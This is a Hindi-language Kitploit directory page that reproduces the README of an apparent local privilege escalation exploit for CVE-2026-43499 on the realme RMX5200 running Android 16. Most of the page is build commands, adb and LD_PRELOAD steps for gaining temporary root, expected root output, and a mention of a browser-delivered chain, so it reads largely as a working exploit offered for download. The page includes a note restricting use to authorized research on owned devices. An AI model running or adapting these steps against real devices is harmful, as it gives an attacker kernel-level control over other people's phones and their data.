Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-43499-RMX5200 — Android 16 पर realme RMX5200 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण जो LD_PRELOAD-आधारित preload.so श्रृंखला का उपयोग करके CVE-2026-43499 के माध्यम से अस्थायी रूट पहुंच प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/sorrow404null/cve-2026-43499-rmx5200
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिशोषण फ्रेमवर्कशोषणशेलकोडपोस्ट-शोषणमोबाइल सुरक्षापेलोड डेवलपमेंटबाइनरी शोषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubsorrow404null/cve-2026-43499-rmx5200

CVE-2026-43499-RMX5200

Android 16 पर realme RMX5200 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण जो LD_PRELOAD-आधारित preload.so श्रृंखला का उपयोग करके CVE-2026-43499 के माध्यम से अस्थायी रूट पहुंच प्राप्त करता है।

रिपॉजिटरी देखें
61221 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-43499 realme RMX5200 के लिए

CVE-2026-43499 स्थानीय विशेषाधिकार वृद्धि SO के लिए:

आइटममान
उपकरणrealme RMX5200 / RE6030L1
एंड्रॉइड16
कर्नेल6.12.23-android16-5-gb2a876903b49-ab14541642-4k
फ़िंगरप्रिंटrealme/RMX5200/RE6030L1:16/BP2A.250605.015/...:user/release-keys

पूर्व-निर्मित बाइनरी: bin/preload.so

यह रिपॉजिटरी केवल SO बिल्ड ट्री रखता है (स्रोत + ऑफसेट + पूर्व-निर्मित)। कोई ब्राउज़र हार्नेस नहीं, कोई फ़र्मवेयर डंप नहीं, कोई परीक्षण स्कैफ़ोल्डिंग नहीं।

सार्वजनिक IonStack / popsicle-शैली श्रृंखला पर आधारित; ऑफसेट इस उपकरण के boot.img + xbl_config.img से पुनर्जीवित।


लेआउट

root@kitploit:~
.
├── bin/preload.so              # prebuilt aarch64 shared object (verified)
├── generate_target.py          # optional: regenerate target.h from boot+xbl
├── source/
│   ├── Makefile
│   └── src/
│       ├── target.h            # RMX5200 offsets
│       ├── main.c preload.c slide.c ...
│       └── kernelsnitch/
└── README.md

निर्माण

आवश्यकताएँ:

  • Android NDK (r27+ अनुशंसित)
  • Python 3 + llvm-objdump (केवल यदि target.h पुनर्जीवित कर रहे हों)

make के साथ

root@kitploit:~
# Linux NDK example
export NDK_ROOT=/path/to/android-ndk
make -C source clean preload

# Windows NDK example
make -C source clean preload \
  NDK_ROOT="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018" \
  NDK_TOOLCHAIN="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018/toolchains/llvm/prebuilt/windows-x86_64"

आउटपुट:

root@kitploit:~
source/build/bin/preload.so

make के बिना (clang सीधे)

root@kitploit:~
cd source
mkdir -p build/bin build/embed
CC="$NDK_TOOLCHAIN/bin/aarch64-linux-android35-clang"

$CC -O2 -Isrc -fPIE -pie -DTARGET_CONFIG_H=\"target.h\" \
  src/su_daemon.c -o build/embed/su_daemon_aarch64_pie

$CC -O2 -Isrc -fPIC -Wno-unused-parameter -Wno-sign-compare -Wno-unused-function \
  -DTARGET_CONFIG_H=\"target.h\" \
  src/main.c src/util.c src/slide.c src/fops.c src/pipe.c \
  src/preload.c src/su_blob.S \
  -shared -o build/bin/preload.so -pthread

ऑफसेट पुनर्जीवित करें (वैकल्पिक)

मैचिंग फ़र्मवेयर इमेज की आवश्यकता है (यहाँ शामिल नहीं हैं):

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  --llvm-objdump llvm-objdump \
  -o source/src/target.h

चलाएँ

ADB LD_PRELOAD

root@kitploit:~
adb push bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

ब्राउज़र श्रृंखला (बाहरी)

इस preload.so को Firefox-151 lonStack-शैली होस्ट (जैसे Rootme डिवाइस प्रविष्टि) के माध्यम से लोड करें। इस रिपॉजिटरी में शामिल नहीं है।

सफलता संकेतक:

root@kitploit:~
slide-kaslr-ok
direct credential result uid=0 ...
local su binary ready path=/data/local/tmp/su
direct-root-summary root=1 ...
root@kitploit:~
uid=0(root) gid=0(root) ... context=kernel

नोट्स

  • केवल अस्थायी रूट — रीबूट के बाद खो जाता है।
  • सफलता के बाद, कुछ ऐप्स रीबूट तक फ्रेमवर्क आरंभीकरण में विफल हो सकते हैं (संबंधित सार्वजनिक लक्ष्यों के समान प्रकार का दुष्प्रभाव)।
  • ऑफसेट बिल्ड-विशिष्ट हैं। अन्य OTA बिल्ड को नए target.h/पुनर्निर्माण की आवश्यकता है।
  • आपके स्वामित्व वाले उपकरणों पर अधिकृत सुरक्षा अनुसंधान के लिए।

श्रेय

  • सार्वजनिक अनुसंधान संदर्भ: IonStack / CVE-2026-43499 राइटअप
  • कार्यान्वयन वंश: popsicle-शैली preload.so श्रृंखला
  • डिवाइस अनुकूलन: RMX5200 (RE6030L1)
टूल डाउनलोड करें